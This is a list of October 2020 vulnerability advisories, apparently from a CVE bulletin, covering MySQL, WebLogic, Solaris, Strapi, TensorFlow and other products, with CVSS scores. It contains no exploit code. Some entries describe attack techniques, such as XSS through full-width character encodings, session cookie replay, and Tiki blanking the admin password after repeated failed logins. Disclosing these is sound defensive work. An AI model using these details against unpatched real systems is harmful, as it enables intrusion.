oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 5.6.49 and prior, 5.7.31 and prior and 8.0.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).	2020-10-21	not yet calculated	CVE-2020-14769 CONFIRM MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: LDAP Auth). Supported versions that are affected are 5.7.31 and prior and 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).	2020-10-21	not yet calculated	CVE-2020-14869 CONFIRM MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).	2020-10-21	not yet calculated	CVE-2020-14868 CONFIRM MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).	2020-10-21	not yet calculated	CVE-2020-14773 CONFIRM MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Charsets). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).	2020-10-21	not yet calculated	CVE-2020-14852 CONFIRM MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 5.7.31 and prior and 8.0.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).	2020-10-21	not yet calculated	CVE-2020-14775 CONFIRM MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Encryption). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).	2020-10-21	not yet calculated	CVE-2020-14800 CONFIRM MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 5.7.31 and prior and 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).	2020-10-21	not yet calculated	CVE-2020-14776 CONFIRM MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).	2020-10-21	not yet calculated	CVE-2020-14777 CONFIRM MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Locking). Supported versions that are affected are 5.6.49 and prior, 5.7.31 and prior and 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).	2020-10-21	not yet calculated	CVE-2020-14812 CONFIRM MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: LDAP Auth). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows low privileged attacker with access to the physical communication segment attached to the hardware where the MySQL Server executes to compromise MySQL Server. Successful attacks of this vulnerability can result in takeover of MySQL Server. CVSS 3.1 Base Score 8.0 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).	2020-10-21	not yet calculated	CVE-2020-14878 CONFIRM MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: LDAP Auth). Supported versions that are affected are 5.7.31 and prior and 8.0.21 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of MySQL Server. CVSS 3.1 Base Score 2.2 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:L).	2020-10-21	not yet calculated	CVE-2020-14771 CONFIRM MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Stored Procedure). Supported versions that are affected are 5.6.49 and prior, 5.7.31 and prior and 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).	2020-10-21	not yet calculated	CVE-2020-14672 CONFIRM MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).	2020-10-21	not yet calculated	CVE-2020-14861 CONFIRM MISC
oracle — mysql	Vulnerability in the MySQL Cluster product of Oracle MySQL (component: Cluster: NDBCluster Plugin). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Cluster. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Cluster accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of MySQL Cluster. CVSS 3.1 Base Score 4.6 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:L).	2020-10-21	not yet calculated	CVE-2020-14853 CONFIRM MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: FTS). Supported versions that are affected are 5.6.49 and prior, 5.7.31 and prior and 8.0.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).	2020-10-21	not yet calculated	CVE-2020-14765 CONFIRM MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Roles). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.1 Base Score 2.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N).	2020-10-21	not yet calculated	CVE-2020-14860 CONFIRM MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).	2020-10-21	not yet calculated	CVE-2020-14785 CONFIRM MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).	2020-10-21	not yet calculated	CVE-2020-14845 CONFIRM MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).	2020-10-21	not yet calculated	CVE-2020-14839 CONFIRM MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).	2020-10-21	not yet calculated	CVE-2020-14837 CONFIRM MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).	2020-10-21	not yet calculated	CVE-2020-14836 CONFIRM MISC
oracle — peoplesoft_enterprise_global_payroll_core	Vulnerability in the PeopleSoft Enterprise HCM Global Payroll Core product of Oracle PeopleSoft (component: Security). The supported version that is affected is 9.2. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise PeopleSoft Enterprise HCM Global Payroll Core. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise HCM Global Payroll Core accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise HCM Global Payroll Core accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of PeopleSoft Enterprise HCM Global Payroll Core. CVSS 3.1 Base Score 6.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L).	2020-10-21	not yet calculated	CVE-2020-14778 MISC
oracle — peoplesoft_enterprise_peopletools	Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Query). Supported versions that are affected are 8.56, 8.57 and 8.58. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks of this vulnerability can result in unauthorized read access to a subset of PeopleSoft Enterprise PeopleTools accessible data. CVSS 3.1 Base Score 2.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N).	2020-10-21	not yet calculated	CVE-2020-14847 MISC
oracle — vm_virtualbox	Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.16. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.1 Base Score 8.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H).	2020-10-21	not yet calculated	CVE-2020-14872 MISC
oracle — vm_virtualbox	Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.16. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle VM VirtualBox accessible data. CVSS 3.1 Base Score 6.0 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N).	2020-10-21	not yet calculated	CVE-2020-14881 MISC MISC
oracle — vm_virtualbox	Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.16. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle VM VirtualBox accessible data. CVSS 3.1 Base Score 6.0 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N).	2020-10-21	not yet calculated	CVE-2020-14885 MISC MISC
oracle — vm_virtualbox	Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.16. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle VM VirtualBox accessible data. CVSS 3.1 Base Score 6.0 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N).	2020-10-21	not yet calculated	CVE-2020-14884 MISC MISC
oracle — weblogic_server	Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 7.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H).	2020-10-21	not yet calculated	CVE-2020-14883 MISC
oracle — weblogic_server	Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).	2020-10-21	not yet calculated	CVE-2020-14882 MISC
oracle –solaris	Vulnerability in the Oracle Solaris product of Oracle Systems (component: Pluggable authentication module). Supported versions that are affected are 10 and 11. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Solaris. While the vulnerability is in Oracle Solaris, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle Solaris. CVSS 3.1 Base Score 10.0 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H).	2020-10-21	not yet calculated	CVE-2020-14871 MISC
overwolf — overwolf	In the client in Overwolf 0.149.2.30, a channel can be accessed or influenced by an actor that is not an endpoint.	2020-10-16	not yet calculated	CVE-2020-25214 MISC
parse_server — parse_server	Parse Server (npm package parse-server) broadcasts events to all clients without checking if the session token is valid. This allows clients with expired sessions to still receive subscription objects. It is not possible to create subscription objects with invalid session tokens. The issue is not patched.	2020-10-22	not yet calculated	CVE-2020-15270 MISC CONFIRM MISC
phpredisadmin — N/A	phpRedisAdmin before 1.13.2 allows XSS via the login.php username parameter.	2020-10-16	not yet calculated	CVE-2020-27163 MISC
python — python	In Python 3 through 3.9.0, the Lib/test/multibytecodec_support.py CJK codec tests call eval() on content retrieved via HTTP.	2020-10-22	not yet calculated	CVE-2020-27619 MISC MISC MISC MISC MISC MISC
qemu — qemu	An issue was discovered in QEMU through 5.1.0. An out-of-bounds memory access was found in the ATI VGA device implementation. This flaw occurs in the ati_2d_blt() routine in hw/display/ati_2d.c while handling MMIO write operations through the ati_mm_write() callback. A malicious guest could use this flaw to crash the QEMU process on the host, resulting in a denial of service.	2020-10-16	not yet calculated	CVE-2020-24352 MISC MISC
rconfig — rconfig	rConfig 3.9.4 and earlier allows authenticated code execution (of system commands) by sending a forged GET request to lib/ajaxHandlers/ajaxAddTemplate.php or lib/ajaxHandlers/ajaxEditTemplate.php.	2020-10-19	not yet calculated	CVE-2020-13778 MISC MISC
reason — s20_ethernet_switch	The affected Reason S20 Ethernet Switch is vulnerable to cross-site scripting (XSS), which may allow attackers to trick users into following a link or navigating to a page that posts a malicious JavaScript statement to the vulnerable site, causing the malicious JavaScript to be rendered by the site and executed by the victim client.	2020-10-20	not yet calculated	CVE-2020-16246 MISC
red_hat — fabric8-maven-plugin	A flaw was found in the fabric8-maven-plugin 4.0.0 and later. When using a wildfly-swarm or thorntail custom configuration, a malicious YAML configuration file on the local machine executing the maven plug-in could allow for deserialization of untrusted data resulting in arbitrary code execution. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.	2020-10-22	not yet calculated	CVE-2020-10721 MISC
rockwell_automation — allen-bradley_flex_io_1794-aent/b_4.003	An exploitable denial of service vulnerability exists in the ENIP Request Path Logical Segment functionality of Allen-Bradley Flex IO 1794-AENT/B 4.003. A specially crafted network request can cause a loss of communications with the device resulting in denial-of-service. An attacker can send a malicious packet to trigger this vulnerability by sending an Electronic Key Segment with less bytes than required by the Key Format Table.	2020-10-19	not yet calculated	CVE-2020-6084 MISC
rockwell_automation — allen-bradley_flex_io_1794-aent/b_4.003	An exploitable denial of service vulnerability exists in the ENIP Request Path Logical Segment functionality of Allen-Bradley Flex IO 1794-AENT/B 4.003. A specially crafted network request can cause a loss of communications with the device resulting in denial-of-service. An attacker can send a malicious packet to trigger this vulnerability by sending an Electronic Key Segment with less than 0x18 bytes following the Key Format field.	2020-10-19	not yet calculated	CVE-2020-6085 MISC
sage — dpw_2020_06_x	An issue was discovered in Sage DPW 2020_06_x before 2020_06_002. It allows unauthenticated users to upload JavaScript (in a file) via the expenses claiming functionality. However, to view the file, authentication is required. By exploiting this vulnerability, an attacker can persistently include arbitrary HTML or JavaScript code into the affected web page. The vulnerability can be used to change the contents of the displayed site, redirect to other sites, or steal user credentials. Additionally, users are potential victims of browser exploits and JavaScript malware.	2020-10-16	not yet calculated	CVE-2020-26583 MISC MISC MISC
sage — dpw_2020_06_x	An issue was discovered in Sage DPW 2020_06_x before 2020_06_002. The search field “Kurs suchen” on the page Kurskatalog is vulnerable to Reflected XSS. If the attacker can lure a user into clicking a crafted link, he can execute arbitrary JavaScript code in the user’s browser. The vulnerability can be used to change the contents of the displayed site, redirect to other sites, or steal user credentials. Additionally, users are potential victims of browser exploits and JavaScript malware.	2020-10-16	not yet calculated	CVE-2020-26584 MISC MISC MISC
sage — easypay	Multiple stored cross-site scripting (XSS) vulnerabilities in Sage EasyPay 10.7.5.10 allow authenticated attackers to inject arbitrary web script or HTML via multiple parameters through Unicode Transformations (Best-fit Mapping), as demonstrated by the full-width variants of the less-than sign (%EF%BC%9C) and greater-than sign (%EF%BC%9E).	2020-10-18	not yet calculated	CVE-2020-13893 MISC MISC
sap — solution_manager_and_focused_run	SAP Solution Manager and SAP Focused Run (update provided in WILY_INTRO_ENTERPRISE 9.7, 10.1, 10.5, 10.7), allows an unauthenticated attackers to bypass the authentication if the default passwords for Admin and Guest have not been changed by the administrator.This may impact the confidentiality of the service.	2020-10-20	not yet calculated	CVE-2020-6369 MISC MISC
simple — download_monitor	SQL injection vulnerability in Simple Download Monitor 3.8.8 and earlier allows remote attackers to execute arbitrary SQL commands via a specially crafted URL.	2020-10-21	not yet calculated	CVE-2020-5651 MISC MISC
simple — download_monitor	Cross-site scripting vulnerability in Simple Download Monitor 3.8.8 and earlier allows remote attackers to inject an arbitrary script via unspecified vectors.	2020-10-21	not yet calculated	CVE-2020-5650 MISC MISC
solarwinds — n-central	SolarWinds N-Central version 12.3 GA and lower does not set the JSESSIONID attribute to HTTPOnly. This makes it possible to influence the cookie with javascript. An attacker could send the user to a prepared webpage or by influencing JavaScript to the extract the JESSIONID. This could then be forwarded to the attacker.	2020-10-19	not yet calculated	CVE-2020-15910 MISC MISC
solarwinds — n-central	SolarWinds N-central through 2020.1 allows session hijacking and requires user interaction or physical access. The N-Central JSESSIONID cookie attribute is not checked against multiple sources such as sourceip, MFA claim, etc. as long as the victim stays logged in within N-Central. To take advantage of this, cookie could be stolen and the JSESSIONID can be captured. On its own this is not a surprising result; low security tools allow the cookie to roam from machine to machine. The JSESSION cookie can then be used on the attackers’ workstation by browsing to the victim’s NCentral server URL and replacing the JSESSIONID attribute value by the captured value. Expected behavior would be to check this against a second source and enforce at least a reauthentication or multi factor request as N-Central is a highly privileged service.	2020-10-19	not yet calculated	CVE-2020-15909 MISC MISC
sprecher — sprecon-e_firmware	Sprecher SPRECON-E firmware prior to 8.64b might allow local attackers with access to engineering data to insert arbitrary code. This firmware lacks the validation of the input values on the device side, which is provided by the engineering software during parameterization. Attackers with access to local configuration files can therefore insert malicious commands that are executed after compiling them to valid parameter files (“PDLs”), transferring them to the device, and restarting the device.	2020-10-19	not yet calculated	CVE-2020-11496 CONFIRM
spree — spree	In Spree before versions 3.7.11, 4.0.4, or 4.1.11, expired user tokens could be used to access Storefront API v2 endpoints. The issue is patched in versions 3.7.11, 4.0.4 and 4.1.11. A workaround without upgrading is described in the linked advisory.	2020-10-20	not yet calculated	CVE-2020-15269 MISC CONFIRM
strapi — strapi	admin/src/containers/InputModalStepperProvider/index.js in Strapi before 3.2.5 has unwanted /proxy?url= functionality.	2020-10-22	not yet calculated	CVE-2020-27664 MISC MISC
strapi — strapi	In Strapi before 3.2.5, there is no admin::hasPermissions restriction for CTB (aka content-type-builder) routes.	2020-10-22	not yet calculated	CVE-2020-27665 MISC MISC
strapi — strapi	Strapi before 3.2.5 has stored XSS in the wysiwyg editor’s preview feature.	2020-10-22	not yet calculated	CVE-2020-27666 MISC MISC
sylius — sylius	In Sylius before versions 1.6.9, 1.7.9 and 1.8.3, the user may register in a shop by email mail@example.com, verify it, change it to the mail another@domain.com and stay verified and enabled. This may lead to having accounts addressed to totally different emails, that were verified. Note, that this way one is not able to take over any existing account (guest or normal one). The issue has been patched in Sylius 1.6.9, 1.7.9 and 1.8.3. As a workaround, you may resolve this issue on your own by creating a custom event listener, which will listen to the sylius.customer.pre_update event. You can determine that email has been changed if customer email and user username are different. They are synchronized later on. Pay attention, to email changing behavior for administrators. You may need to skip this logic for them. In order to achieve this, you should either check master request path info, if it does not contain /admin prefix or adjust event triggered during customer update in the shop. You can find more information on how to customize the event here.	2020-10-19	not yet calculated	CVE-2020-15245 MISC CONFIRM
synapse — authrestservlet	AuthRestServlet in Matrix Synapse before 1.21.0 is vulnerable to XSS due to unsafe interpolation of the session GET parameter. This allows a remote attacker to execute an XSS attack on the domain Synapse is hosted on, by supplying the victim user with a malicious URL to the /_matrix/client/r0/auth//fallback/web or /_matrix/client/unstable/auth//fallback/web Synapse endpoints.	2020-10-19	not yet calculated	CVE-2020-26891 MISC MISC CONFIRM MISC
synk — synk	This affects the package scratch-svg-renderer before 0.2.0-prerelease.20201019174008. The loadString function does not escape SVG properly, which can be used to inject arbitrary elements into the DOM via the _transformMeasurements function.	2020-10-21	not yet calculated	CVE-2020-7750 MISC MISC
synk — synk	This affects all versions of package osm-static-maps. User input given to the package is passed directly to a template without escaping ({{{ … }}}). As such, it is possible for an attacker to inject arbitrary HTML/JS code and depending on the context. It will be outputted as an HTML on the page which gives opportunity for XSS or rendered on the server (puppeteer) which also gives opportunity for SSRF and Local File Read.	2020-10-20	not yet calculated	CVE-2020-7749 MISC MISC MISC
tensorflow — tensorflow	In Tensorflow before version 2.4.0, when the `boxes` argument of `tf.image.crop_and_resize` has a very large value, the CPU kernel implementation receives it as a C++ `nan` floating point value. Attempting to operate on this is undefined behavior which later produces a segmentation fault. The issue is patched in eccb7ec454e6617738554a255d77f08e60ee0808 and TensorFlow 2.4.0 will be released containing the patch. TensorFlow nightly packages after this commit will also have the issue resolved.	2020-10-21	not yet calculated	CVE-2020-15266 CONFIRM CONFIRM CONFIRM
tensorflow — tensorflow	In Tensorflow before version 2.4.0, an attacker can pass an invalid `axis` value to `tf.quantization.quantize_and_dequantize`. This results in accessing a dimension outside the rank of the input tensor in the C++ kernel implementation. However, dim_size only does a DCHECK to validate the argument and then uses it to access the corresponding element of an array. Since in normal builds, `DCHECK`-like macros are no-ops, this results in segfault and access out of bounds of the array. The issue is patched in eccb7ec454e6617738554a255d77f08e60ee0808 and TensorFlow 2.4.0 will be released containing the patch. TensorFlow nightly packages after this commit will also have the issue resolved.	2020-10-21	not yet calculated	CVE-2020-15265 MISC MISC CONFIRM
tibco — multiple_products	The Transaction Insight reporting component of TIBCO Software Inc.’s TIBCO Foresight Archive and Retrieval System, TIBCO Foresight Archive and Retrieval System Healthcare Edition, TIBCO Foresight Operational Monitor, TIBCO Foresight Operational Monitor Healthcare Edition, TIBCO Foresight Transaction Insight, and TIBCO Foresight Transaction Insight Healthcare Edition contains a vulnerability that theoretically allows an authenticated attacker to perform SQL injection. Affected releases are TIBCO Software Inc.’s TIBCO Foresight Archive and Retrieval System: versions 5.1.0 and below, version 5.2.0, TIBCO Foresight Archive and Retrieval System Healthcare Edition: versions 5.1.0 and below, version 5.2.0, TIBCO Foresight Operational Monitor: versions 5.1.0 and below, version 5.2.0, TIBCO Foresight Operational Monitor Healthcare Edition: versions 5.1.0 and below, version 5.2.0, TIBCO Foresight Transaction Insight: versions 5.1.0 and below, version 5.2.0, and TIBCO Foresight Transaction Insight Healthcare Edition: versions 5.1.0 and below, version 5.2.0.	2020-10-20	not yet calculated	CVE-2020-9417 CONFIRM
tiki — tiki	tiki-login.php in Tiki before 21.2 sets the admin password to a blank value after 50 invalid login attempts.	2020-10-22	not yet calculated	CVE-2020-15906 MISC MISC
tink — tink	A mis-handling of invalid unicode characters in the Java implementation of Tink versions prior to 1.5 allows an attacker to change the ID part of a ciphertext, which result in the creation of a second ciphertext that can decrypt to the same plaintext. This can be a problem with encrypting deterministic AEAD with a single key, and rely on a unique ciphertext-per-plaintext.	2020-10-19	not yet calculated	CVE-2020-8929 CONFIRM CONFIRM
